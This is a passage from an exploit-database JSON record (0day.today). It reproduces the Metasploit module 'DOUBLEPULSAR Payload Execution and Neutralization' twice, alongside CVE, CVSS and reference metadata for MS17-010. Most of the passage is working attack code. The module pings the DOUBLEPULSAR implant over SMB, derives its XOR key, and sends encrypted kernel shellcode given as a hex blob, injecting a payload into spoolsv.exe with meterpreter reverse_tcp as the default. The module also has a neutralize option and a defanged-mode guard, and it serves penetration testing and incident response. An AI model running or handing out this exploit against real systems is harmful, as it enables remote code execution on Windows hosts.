ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-26] #"}, "lastseen": "2021-10-26T08:21:53", "differentElements": ["sourceData"], "edition": 56}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3c158095563da9d2437f866e439a2a71", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-26T22:29:31", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96709", "SMNTC-96706", "SMNTC-96707", "SMNTC-96703", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-26T22:29:31", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-26T22:29:31", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n 